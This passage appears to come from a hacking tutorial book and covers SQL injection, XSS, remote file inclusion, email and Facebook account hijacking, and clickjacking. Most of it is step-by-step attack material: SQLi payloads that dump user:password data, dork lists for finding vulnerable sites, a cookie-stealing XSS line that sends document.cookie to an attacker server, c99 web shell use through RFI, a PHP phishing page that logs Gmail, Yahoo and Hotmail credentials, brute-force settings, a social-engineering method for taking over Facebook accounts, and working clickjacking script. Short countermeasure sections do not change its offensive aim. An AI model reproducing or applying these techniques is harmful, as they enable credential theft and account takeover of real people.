We use table_name and information_schema.tables. for this purpose. Example: http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/* Here we replace the our number 2 with table_name to get the first table from information_schema.tables If we couldnt find any result then we need to add LIMIT to the end of query to list out all tables. Example: http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/* We can change limit 0,1 to limit 1,1. To view the 2nd table. Example: http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/* the second table will be displayed. We should have to put limit 2,1to get 3rd table. Example: http://www.site.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

We need to add one until we will get some useful like db_admin, poll_user, auth, auth_user etc. Find Column names: Here we use column_name and information_schema.columns Example: http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/* the first column will be displayed. Example: http://www.site.com/news.php?id=1 union all select 1,column_name,3 from information_schema.tables limit 1,1/* The second table will be displayed. We need to put limit 0,1 to get 3rd table. Example(Finding Password): http://www.site.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* You will get into in this format user:password(or hash):email example: admin:hash:[email protected]

Blind SQL Injection

1). Check for vulnerability
Let's say that we have some site like this http://www.site.com/news.php?id=1 Now to test if is vulnerable we add to the end of URL ( and 1=1 which is false) If it takes some changes in webpage then the website is vulnerable to Blind Sql Injection.

2) Check for MySQL version

We use substrings to get the MySQL version. Example: http://www.site.com/news.php?id=1

and

substring(@@version,1,1)=4

This should return true if the version is 4, Replace 5 with 4 then if query return TRUE then the version is 5. If any case select doesnt work then we can use subselect.

2) Find table names

You need to guess for table and columns names. Example: http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 With limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important. If the page loads normally without content missing, the table user exists. If we get FALSE (some article missing), we need to change table name until we guess the right one.

3) Find column names

As same before we have to guess column name. Example: http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Here we merge 1 with the column password, then substring returns the first character (1,1)

4) Extract data from database

We need to pull character to find column data. http://www.site.com/news.php?id=1and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 This here extracts the first character from first user in table users. Substring here returns first character and 1 character in length. ASCII() converts that 1 character into ASCII value and then compare it with symbol greater then > . So if the ASCII char greater then 80, the page loads normally. (TRUE) we keep trying until we get false. http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Here we get false. So the first character in username is char(99). Using the ASCII converter we know that char(99) is letter 'c' then let's check the second character.

http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Note that we had changed ,1,1 to ,2,1 to get the second character.Now it returns the second character, 1 character in length. http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 TRUE, the page loads normally, higher. http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 FALSE, lower number. http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 TRUE, higher. http://www.site.com/news.php?id=5 and ASCII(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 FALSE!!!

We know that the second character is char(105) and that is 'i'. We have 'ci' so far so we need to keep incrementing until we get the end. (When >0 returns false we know that we have reach the end). Blind SQL Injection is a very time consuming method. We can use automated tools to perform Blind sql injection. Sqlmap is one of best tool used for this purpose.

Google Dorks to find SQL Injection vulnerable website

Here are some google dorks given below, you can use it to find sql vulnerable websites. inurl:index.php?id= inurl:trainers.php?id=

inurl:buy.php?category= inurl:article.php?id= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:Pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id=

You can get the full list from: http://www.invisblenandu.com/2011/04/5000-sqldorks.html

Automated Tools
Sql injection vulnerability scanners and sql injection exploiters are used to perform penetration testing for sql injection vulnerability in web applications.

Sql Injection Vulnerability scanners

Scrawlr: it crawls a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities.

Download Link: http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/f inding-sql-injection-with-scrawlr.aspx

Webcruiser: It crawls the website for sql injection vulnerabilities,X-Path and XSS Vulnerabilities.

Download Link: http://sec4app.com/

Sql Injection Exploitation Tools

Havij: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Download Link: http://itsecteam.com/en/projects/project1_page2.htm Sqlmap: SQL scanner capable of enumerating entire remote databases, and performs an active database fingerprinting.

Download Link: sqlmap.sourceforge.net/ Bobcat: It is based on a tool named "Data Thief" that was published as PoC by appsecinc. BobCat can exploit SQL injection bugs/opportunities in web application.

Download Link: www.securiteam.com/tools/5HP011FHPO.html

SQL Inject Me: SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities. The tool works by submitting your HTML forms and substituting the form value.

Download Link: https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me

SQL Injection Countermeasures

SQL injection is kind a complex vulnerability and usually applying a fix will differ on which type of application you are developing. By the way instead of its complexity and different types of injection methods SQL injection is one of the easiest to counter. Following are some measures that can be used against SQL injection attack. 1. As told earlier SQL injection attacks occurs due to non-sanitized input. So our first step would be sanitizing input. At developer level build application which explicitly escapes single quotes and apostrophe, do not validate input of expression type for example, 1 + 1, x+ y etc. By sanitizing input by above method you'll be able to stop SQL injection since application will not accept malicious input. 2. The second solution at developer level is to use Application Programming Interface (API's) which disallow SQL injection. Today nearly every web application development tool has an API which handles SQL queries all by its own, its better to use them because

they not only reduce overall development overhead but also provide protection against SQL injection. 3. At system level allow application to run at possible lower privileges, with which it can run flawlessly. There's no need to grant application more privileges than required. It might take little time to apply this but doing so will disallow hacker to retrieve sensitive data from your database since privileges will be limited. 4. Lastly remove unnecessary database packages from your system since they don't only take extra memory and disk space but if any of them is vulnerable your database will become vulnerable too. Depending upon what kind of application you are developing some or more modifications may need while development to avoid injection. But at practical level above countermeasures can surely be applied to any kind of web application to ensure protection against SQL injection.

Chapter 8
Objectives:

Cross site scripting attack & countermeasures

Types of XSS How to find XSS Vulnerability Basic Injection codes Advanced Injection codes Google Dorks to find search boxes on websites XSS Vulnerability scanners XSS Exploitation automated tools

XSS vulnerability is one of common vulnerability found in many web applications. An attacker can exploit this vulnerability to get cookies of session on any web application. By analyzing these cookies an attacker can get login information of users on the web application.XSS is basically a client side attack. An attacker can add his own contents to the webpage by exploiting XSS Vulnerability at the client side.

Types of XSS
There are actually three types of Cross site scripting, commonly known as: DOM Based Persistent Non-Persistent

DOM Based

An attacker can attack victim web page as well as victim local machine by exploiting this vulnerability. An attacker can set up a malicious html web page to the victim machine. The vulnerable page can be easily executed by sending command to victim machine. An attacker can easily gain control to the victim machine by using user privileges.

Persistent

In persistent XSS vulnerability, an attacker doesnt need to pass crafted url through search box. Webpage itself permits attacker to insert fixed data to the form field. Data provided by attacker on webpage lead to changes in webpage appearance. Guestbook is the example of this kind of vulnerabilities.

Non-Persistent

It is the most commonly found vulnerabilities found on net. Its commonly named as Non-persistent because it works on an immediate HTTP response from the victim website. An attacker writes some arbitrary html codes to the search boxes of website and it will return the results of this html entities.

How to find XSS Vulnerability

We need to find search box, shout box, guestbook or any web form for exploiting XSS.We can find these by using any Google dork inurl:search.php?q=.We can exploit vulnerable webpage using injection codes.

Basic Injection Codes

http://website.com/search.php?q=<script>alert("Hindustan Cyber force)</script> http://website.com/search.php?q=<br><br><b><u>Hindustan cyber force</u></b> http://website.com/search.php?q=<html><body><IMG SRC="http://website.com/IMAGE.png"></body></html> http://website.com/search.php?q=<html><body><h1><b>Hindustan force</b></h1></html> cyber

Advance Injection Codes

Cookie stealing We have to download a cookie logger script before proceeding next step. We can get cookie logger script from http://www.ziddu.com/download/13227521/cookiestealer.zip.html after downloading the file we have to upload the cookie logger to any web hosting server for example (110mb.com).We have to create the file log.txt and chmod to 777,Now we have to find any XSS vulnerable website and have to inject following code into the search box. window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie or document.location "http://yourServer.com/cookielogger.php?c="+document.cookie =

Now when user visits the page that got injected too, they will be sent to the website and cookie will be stolen, the second one is more stealth our file now or cookies then we can hijack there session.

How to find Persistant XSS vulnerable websites

We need to find guestbooks which allowed arbitrary html codes by user. Google Dork: html enabled guestbook It will list all search results which consists html enabled guestbooks. We can add arbitrary html codes and submit to server. Attacker can add images, flash videos, hyperlinks on guestbook by using allowed html tags, this is known as html injection.

Google Dorks to find Search boxes on website

Inurl:search.php?p= Inurl:search.php?name= Inurl:search.php?q= Inurl:search.php?m= Download the full list of all Google dorks from the given link below:http://pastebin.com/5RukrgTc

XSS Vulnerability scanners

Standard web applications scanners like w3af, acunetix, IBM rational webscan scans website for xss vulnerability. Download Link for w3af: http://sourceforge.net/projects/w3af/ Download Link for acunetix: http://www.acunetix.com/vulnerabilityscanner/download.htm Download Link for IBM Rational webscan: http://www.ibm.com/developerworks/downloads/r/appscan/

XSS Exploitation Automated tools

Xsser is tool used for exploit xss vulnerability on any webapplication. We can also use firefox add-on xss me for the same purpose, it provides number of exploitation codes for exploiting xss vulnerability on webapplication.

Chapter 9
Objectives:

Remote file inclusion & Countermeasures

Google dork to find vulnerable websites How to identify vulnerability in website How to exploit the vulnerability Vulnerbility scanners Exploitation tools Countermeasures

Remote file inclusion is a type of vulnerability often found on php websites. It allows attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to improper validation of user supplied inputs.

Google dorks to find vulnerable websites

Inurl:home.php?page= Inurl:index.php?page= Inurl:view.php?page= Inurl:contact.php?name= Visit the link given below for full list. http://www.alboraaq.com/forum/abh50250/

How to identify vulnerability in website

First of all, We have to Select any search result generated by any google dork then Put www.google.com after = if the google search engine will be shown below on the webpage then, it concludes I am Vulnerable, Hack me

Example: www.site.com/contact.php?name=www.google.com/

How to exploit the Vulnerability

Once you found, the vulnerable website then Upload c99 shell to any free webhosting service (I prefer www.my3gb.com). We can download c99 shell from www.hcf.co.in/downloads. After uploading the c99 shell to the server get the shell link (for eg. We have shell link address is www.my3gb.com/name.php) and put the shell url after = It will redirect the webpage to the c99 shell. Once you have redirected the website to c99 shell then The website will be all yours.

Example: www.site.com/contact.php?name=www.my3gb.com/name.php

Vulnerabilty Scanners
(1)Fimap
fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and rfi bugs in webapps. fimap is similar to sqlmap just for LFI/RFI bugs instead of sql injection. It is currently under heavy development but its usable. Features

Check a Single URL, List of URLs, or Google results fully automatically. Can identify and exploit file inclusion bugs. Test and exploit multiple bugs.

Download Link: http://code.google.com/p/fimap/

(2)Uniscan
Uniscan is remote code execution & rfi vulnerability scanner used for scanning of webapplications for rfi/lfi bugs. Download Link: http://sourceforge.net/projects/uniscan/files/latest/download

Exploitation Tools:
Fimap is also used for exploitation of rfi/lfi bugs in any webapplication.It first scans webapp for bugs then exploit it. Download Link: http://code.google.com/p/fimap/

Countermeasures:
If you are developing any webapplication: (1)use proper input validation. (2)proper sanitizing of input value. (3)update your webapplication with security updates (4)Disable allow_url_fopen and allow_url_include in php.ini. (5)Keep your support lists private-it may leak the information about reported vulnerability to outside user.

Chapter 10
Objectives:

Email account Hacking & security

Vulnerabilities in email services Techniques used in Email hacking Email account security measures Password recovery tools

An Email address is the address given by email service provider to user for transporting of message between two users. Email service is widely used service by companies and individuals, All the communications has been taken place through email accounts only, If someone get access to your email account then confidential information can be sent to unsafe hands, that must be harmful for the victim. Yahoo, Gmail & Hotmail are mostly using email services. IMAP & POP3 are the protocols used in services. We will discuss about Hacking & security of these email accounts in next some pages.

Vulnerabilities in email services

While using web based email services, after clicking a link present in the email body,it transfers from url of current page(webmail url) to the next page(link present).This info is transmitted through third party web servers,It can include: Email address Login ID Actual Name

Techniques used in email Hacking

There are 4 techniques used for email account hacking. (1)By answering security question & Social Engineering (2)By stealing cookies from victims web browser. (3)By Phising (4)By password Bruteforcing

(1)By answering security question & Social Engineering

Security question set up by user while creating email account. It is used to recover lost password. Once we correctly answer the security question set by user then we can request for new password from server. Now we can access to the victim inbox by using new password. Social Engineering is an art of manipulation to retrieve confidential information from any human. If the victim user closes to us then we can easily find out correct answer of question by using very less effort. If we dont know the user then we have to make some extra effort but If you are perfect in mind game then no one can beat you, There is no security tool developed which protect from social engineering attack. For Gmail Recovery page URL: https://www.google.com/accounts/recovery . For Yahoo Recovery page URL: https://edit.india.yahoo.com/forgot

For Hotmail Recovery page URL: https://account.live.com/ResetPassword.aspx

(2)By stealing cookie from users web browser

Web browser stored user authentication information in encrypted form known as cookie. When the victim user access to email account on web browser then it stores encrypted information of each login in form of cookie (when cookie is enable to the victims browser). If we can get access to the victims browser cookies then we may hack his email accounts. We use cookie stealer for the same purpose. Cookie stealer is a script written in php.

How the Hack Begins? This technique works for each and every email services. We have to download a cookie logger script before proceeding next step. We can get cookie logger script from http://www.ziddu.com/download/13227521/cookiestealer.zip.html after downloading the file upload the cookie stealer to any web hosting server for example(110mb.com).Create the file log.txt and chmod to 777,then send the cookie stealer url ,for example: www.110mb.com/hmalviya9/cookie.php) to the victim user, It will captures all the cookies from the victims browser when he clicks on link.

(3)By Phising

This technique also works for all email services. Phising is process of making clone page of any webpage. Clone page is called phiser. We have to create clone page for email

login page then send it to victim. Once the victim will login through the phiser page,Login authentication information will be sent to the attacker. An Attacker manage to send clone page to victim by using social engineering techniques. How to make clone of email account login Clone page is also known as hoax. First of all Go to desired email account login page. For Gmail -> https://www.gmail.com/login Yahoo -> https://www.login.yahoo.com Hotmail -> https://www.login.live.com Save the page as html and in notepad then go ->view->find and put action= in find dialog box. For Gmail -> Replace action=https://www.gmail.com/login with action=next.php For Yahoo -> Replace action=https://www.login.yahoo.com with action=next.php For Hotmail -> Replace action=https://www.login.live.com with action=next.php Change the method to GET instead of POST then save it as index.php

Coding of next.php
<?php header("Location: https://www.gmail.com/login "); #For Gmail header("Location: https://www.login.yahoo.com "); #For Yahoo header("Location: https://www.login.live.in "); #For Hotmail $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit;
?>

Make a blank text file and save it as passwords.txt. Now we have to upload index.php,next.php and passwords.txt to any free server hosting website I prefer(my3gb.com). Here index.php is our clone page we have to send this page to the victim, Once the victim will login through the hoax page, Login information will be automatically sent to passwords.txt . Suppose our clone page address is my3gb.com/malviya/index.php then we have to send this page to victim in order to

hacking of email account. Use some social engineering techniques for making the hack effort more effective. Defense against phising attack Download netcraft antiphising toolbar to your browser from http://toolbar.netcraft.com/ For defending against phising scam.

(4)By Password Bruteforcing

We can crack password of yahoo email account by using wordlist & bruteforcing method. Gmail & Hotmail account cant be brutforced. We use Brutus tool for bruteforcing of yahoo email account passwords. Brutus http://www.hoobie.net/brutus/brutus-download.html - Official Download Download:

We can put brutus and run it from a flash drive, it is a portable program and requires nothing to be ran. It can also be ran under WineHQ on linux (I have personally tested). Open up Brutus and configure it as is:

The following settings must be set up:

*Target : pop3.yahoo.com *Attack Type : Pop3 *Connections : 60 (all the way) *Timeout : 60 (all the way) *Try to stay connected all the way *Single User (put the email to attack here) *I would suggest using a proxy (google, there normally in IP:PORT Format) If you don't already have a good wordlist, you can grab mine from here: http://www.ziddu.com/download/8565751/PasswordDictionary.zip.html Basically it will just attempt every password in the dictionary tell it finds the right password. If the dictionary attack fails, we can also attempt a Brute Force attack (also called a cryptanalysis attack) where it goes through and guesses every possible string combination. #Gmail account password cant be bruteforced because it uses captcha system at the time of authentication process.

Email Account Security Measures

(1)Best way to protect an email account from hacker is to use strong passwords. A strong
password contains upper case,lower case,numbers & alphanumeric numbers. Set password by using Mary had a little lamb. The lamb had white fleece. Consider the first letter of each word; Eg.- MHALLTLHWF Put every second letter of abbreviation in lower case Replace A with @ & L with ! thus then a new password is formed which contains more then 8 characters. New Password: Mh@!Lt!hWf (2)Use sign-in seal(for yahoo users),Sign-in seal protect users from phising scam. (3)Set an alternate email address during signup,Lost password can be recovered to alternate email address. (4)Set you mobile number during signup , It helps us to recover our account. (5)Never select the option keep me signed in or remember me at time of login,If you select this option,next time it will automatically open your account on the same computer.

(6)Use email security tools (Email protector,SuperSecret). Download Link for Email protector: http://www.softpedia.com/get/Internet/Email/Mail-Utilities/Email-Protector.shtml Download Link for SuperSecret: http://download.cnet.com/SuperSecret/300018501_4-91956.html

Password Recovery Tools

Mail Pass View: It is small recovery tool that reveals passwords and other account details for Yahoo, Gmail, Hotmail, outlook etc. email clients.

Download Link: http://majorgeeks.com/Mail_PassView_d3860.html Mail Password: Mail Password is universal password recovery tool for POP3 Email accounts. Download Link: http://download.cnet.com/Email-Password-Recovery-Master/300018501_4-10641123.html Password revelear javascript: This javascript is used to reveal login information hide behind astriks (*****), We just have to put the Script on the address bar, It will reveals password hide behind astriks within a minute.

Code: javascript: alert(document.getElementById('Passwd').value);

Chapter 11
Objectives:

Facebook account hacking & security

Facebook account hacking using wireshark Facebook account hacking using firesheep Facebook account hacking using recovery options Facebook account security countermeasures

Facebook is one of the most widely used social networking website with more than 750 million users, which is the reason behind becoming hot target of all hackers.

How to hack anyone facebook account when both victim and attacker are using same network?
(1)Using Wireshark

First of all I must clear you even though you'll get access to victim's account you'll not get his/her password, next this trick will work only on LAN with hub. For this hack you'll need wireshark which is a packet sniffing tool, Mozilla Firefox web browser and add n edit add-on for Mozilla Firefox. Now I assume you have all above components for hacking facebook and you are connected in a hub based LAN or LAN

which has been ARP poisoned. So now click on capture button and start capturing packets. Now using command line shell ping www.facebook.com you want to hack to get its IP address, filter all IP packets having IP address of www.facebook.com and search for HTTP protocol followed by GET /home.php, this may vary depending on region and time/zone but don't bother try to search all packets with HTTP GET for cookies. Now from packet details window expand the packet information for above packet and you'll get 8-10 different cookies that are stored by www.gmail.com on victim's PC. Right click and copy all cookies names and values in notepad. Now open Mozilla Firefox browse to tools and open Cookie editor. Add each cookie to your cookie folder using Cookie editor. Now close Cookie editor and open gmail, you'll find yourself logged into the victims account.

Defense against this attack: A system administrator should use tools used for countering sniffing. Don't log-in into your accounts if you know your LAN is not protected and if you want to log-in better use a tunneled connection. Download Wireshark from http://www.wireshark.org/. Download Add N Edit Cookies from Add-Ons Mozzila (2) using Firesheep

Fire sheep is an extension developed by Eric Butler for the Firefox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities. It shows the discovered identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name Thing we need: 1. Firefox Browser 2. Fire sheep Firefox plugin Procedure: 1. First download and install Firefox browser and Fire sheep add on

2. Open Firefox , Now click the (1) view button then select (2) side bar finally click(3) fire sheep or simply press ( ctrl + shift +s ) to open fire sheep

3. Now you can see fire sheep has opened up in the side bar Now select your interface by going to preferences as shown

4. Now click on start capture button and wait for a while , 5. Now you can see different pre- authenticated sessions on the side bar select the session which you want . 6. Now you will be automatically logged in the victims account .You can use this tool to hack Facebook/Twitter accounts

How to hack anyone facebook account when both victim and attacker are using different network?
Phising, Cookie stealing can work this time as I discussed before in email hacking section.(see page no.

Hacking Facebook account password using recovery option

Facebook has introduced a feature of using Recovering password using Trusted Friends. In this feature, if we have lost our Facebook account password, Facebook will send the security code to 3 friends. We have to ask those 3 friends for the security codes and after entering them, we can reset Facebook password. So, in this hack, we will use this feature for hacking Facebook account password. So, you have to create 3 fake accounts and make sure that your victim adds them as his friends. So, your 3 fake accounts must be listed in your victims Friends list. Now, if we use the above Trusted friends feature for resetting victims Facebook password, Facebook will send the security code to our 3 fake accounts and we can easily hack Facebook account. You can use Social engineering skills so that your victim will have no doubt while accepting your fake account as his friend. This is the only tricky part of the hack. Also, the fake accounts must be at least a week old. Once you are done with fake accounts, move to the steps below. Step 1. Go to Facebook.com and hit on Forgot Password link to get this page:

Step 2. You have to enter the email of the victim, or even the Facebook profile name will do. Facebook will search for profile name and you will be shown the account. Hit on This is my account

Step 3. On the next page, hit on No longer have access to these.

Step 4. You will be prompted for email address. Enter your email address here and hit on Submit.

Step 5. Facebook will ask you ask you to answer the Security question. Use social engineering to find out correct answer of question or else you can go for next steps by entering three

wrong answer ( Its not necessary you will prompt to next step of recovery because it depends on account to accounts )

Step 6. Now if you will able to proceed into next step recovery through three friends. Here you have to select three friends from random lost generated by facebook. It is not necessary that you fake accounts will be there in the list but possibilities are always there.

Now we have to get codes from all three accounts which have selected during recovery process after getting code we can set new password. Email address change mail will be sent to the old associated email id of victim. The account will be locked out for 24 hours. Now its attacker duty to get access before victim otherwise victim can recover his account. # Victim can be easily recover his account by answering security question. Once you have set security question it cant be changed.

Facebook account security countermeasures

Enable HTTPS protocol Using HTTPS instead of simple HTTP means that you are securing your communication between the server and your computer. No one will be able to hack between your computer and the server so you can be sure that all the information delivered to and from your computer is completely safe. Modern browsers can highlight the secure URLs with the information about the certificate issuing authority. Here is a screenshot of secure Facebook open in Firefox: To enable HTTPS, you can login to your Facebook account and go to Account -> Account Settings. Select Account Security under Settings tab and check the box beside Browse Facebook on a secure connection (https) whenever possible

Use Facebook two-steps authentication (Login approvals) Like Google, Facebook has also introduced two-step authentication service called Login Approvals. This service lets you login to your Facebook account by using your password plus a security authentication code sent to your mobile device. By enabling this service, you will no longer be able to login to Facebook by only using your password. You will always be required to use the password and security code sent to your mobile device. Checking for facebook email phising attack and scams While you are in Facebook, you should never click on suspicious links even if the messages were sent from your friends. Most Facebook scams spread by posting messages to walls of all friends of the infected user. The best place to get updated news about Facebook scams is Facecrooks.com. Enable Login notifications Enabling login notifications in Facebook will notify you when someone logs in from a suspicious location or computer. To enable login notification, go to Account -> Account Settings. Under settings tab expand Account security -> Login notification, check the following two boxes:

Send me an email Send me a text message

Use Facebook one time password service Like Hotmail, Facebook also provides the facility of one-time password. One-time password is a temporary password which can only be used once and expires within 20 minutes of creation. To enable this service, youll need to activate a phone number so that Facebook can send messages to your mobile. To register and activate a phone number you can go to Account -> Account settings.

Chapter 12
Objectives: How it works Mitigation

Facebook Clickjacking

What well see in the future Install it Countermeasures

It allows setting up a website where users will do a facebook like without their knowledge when clicking any link on the page. This works by dragging an invisible (very low opacity) facebook like button bellow the mouse when the user hovers a link.

How it works
Since we cannot inject css or javascript inside the facebook iframe, we cannot change the cursor:pointer css property when the mouse is over the like button, so it would be suspicious to have a page always with a clicking-hand mouse cursor. The workaround was making the like button follow the mouse when its normal to have a clicking-hand mouse cursor (cursor:pointer) such as when hovering a link! After clicking a link, the user will like the current page in facebook and will in fact be redirected to the href (through javascript magic document.location.href) and a cookie will be defined so that the facebook like button no longer appears in future page loads.

Mitigation
The purpose of this script is creating a discussion about how to prevent clickjacking and by using this script for any reason other than security debugging you might be violating Facebook Terms and Service Statements and might lose your Facebook account. As such, the code you have below its easily found on the web if you use it in your website and Ill personally report you if you use it for malicious reasons.

What well see in the future

Before discussing how clickjacking will evolve, there is an important assumption to keep in mind: its possible to share a website not directly connected to where the like button is placed, meaning I might place a like button in fernandomagro.com liking another website/domain. So, its possible to create a database of websites and generate a lot of different like buttons consecutively in the same website. Wrapping it all up, when Facebook Clickjacking goes viral, I believe we will start seeing consecutive clickjacking likes/shares from malicious websites with huge galleries where a lot of clicking takes place. Example: having a gallery with 500 interesting pictures, imagine clicking those galleries for 2 hours and then returning to facebook and realizing the account was flooded with a huge amount of unrequested likes.

Install it
I managed to wrap it all up around a nice javascript file that you just need to include to make it work in your webpage. Change the headers of your webpage with the following:
<script src="http://code.jquery.com/jquery-1.5.js"></script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script> <script>window.DO_CLICKJACKING = 1</script> <script src="clickjacking.js"></script>

Then, download the file from http://malviya.my3gb.com/clickjacking.js and put it in an accessible folder:
Code: var $J = jQuery.noConflict(); // solve: images and floating divs function heightestChild(elem) { var t=0; var t_elem; $J("*",elem).each(function () { if ( $J(this).outerHeight(true) > t ) {

t_elem=$J(this); t=t_elem.outerHeight(true); } }); // we care about the heighest if (elem.outerHeight(true) > t) { t = elem.outerHeight(true); } //return elem.outerHeight(true); return t+3; // hotfix } function highestOffsetTop(elem) { var t=elem.offset().top; var t_elem; $J("*",elem).each(function () { if ( $J(this).offset().top < t ) { t_elem=$J(this); t=t_elem.offset().top; } }); // we only care about the object that is most on top if (elem.offset().top < t) { t = elem.offset().top; } //return elem.offset().top; return t+3; } // 57 19 63 $J(document).ready(function(){ if (window.DO_CLICKJACKING) { // wrap up EVERYTHING /*$J("body").append('<div id="clickjacking" style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-mozopacity:.01;filter:alpha(opacity=1);"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');*/ $J("body").append('<div id="clickjacking" style="position:absolute;display:block;"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>'); var elementWidth = 0; var elementHeight = 0; var theElement = ''; var likeDone = 0;

if ($J.cookie("clickjacking_"+escape(document.URL)) == 1) { likeDone = 1; } // fired when the user clicks a link (likes our page) -> clickjacking is done FB.Event.subscribe('edge.create', function(response) { $J("#clickjacking").css("display", "none"); likeDone = 1; $J.cookie("clickjacking_"+escape(document.URL), "1"); // let the user actually go to the link he clicked. window.location.href = theElement.attr('href'); }); $J(document).mousemove(function(event) { if (theElement != '') { if (event.pageY < (highestOffsetTop(theElement)-4) || event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) || event.pageX < theElement.offset().left || event.pageX > (theElement.offset().left + theElement.width()) ) { //alert(event.pageY + " " + theElement.height() + " " + theElement.offset().top); /* $J("#log").append("<p>mouse off the element LEFT " + event.pageX + " " + theElement.offset().left + " " + (theElement.offset().left + theElement.width()) + "</p>"); $J("#log").append("<p>mouse off the element TOP " + event.pageY + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) + heightestChild(theElement,true)) + "</p>");*/ theElement = ''; // the mouse is off theElement $J("#clickjacking").css("display", "none"); } else { if ($J.browser.msie) { $J("#clickjacking").css("top",(event.pageY15)+"px"); $J("#clickjacking").css("left",(event.pageX20)+"px"); } else { $J("#clickjacking").css("top",(event.pageY5)+"px"); $J("#clickjacking").css("left",(event.pageX20)+"px"); } } } });

$J(document).delegate("a","mouseenter", function (){ // register mouse is inside element if (likeDone == 0) { theElement = $J(this); $J("#clickjacking").css("display", "block"); } }); } // window.DO_CLICKJACKING }); /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ /** * Create a cookie with the given name and value and other optional parameters. * * @example $.cookie('the_cookie', 'the_value'); * @desc Set the value of a cookie. * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true }); * @desc Create a cookie with all available options. * @example $.cookie('the_cookie', 'the_value'); * @desc Create a session cookie. * @example $.cookie('the_cookie', null); * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain * used when the cookie was set. * * @param String name The name of the cookie. * @param String value The value of the cookie. * @param Object options An object literal containing key/value pairs to provide optional cookie attributes. * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object. * If a negative value is specified (e.g. a date in the past), the cookie will be deleted. * If set to null or omitted, the cookie will be a session cookie and will not be retained * when the the browser exits. * @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).

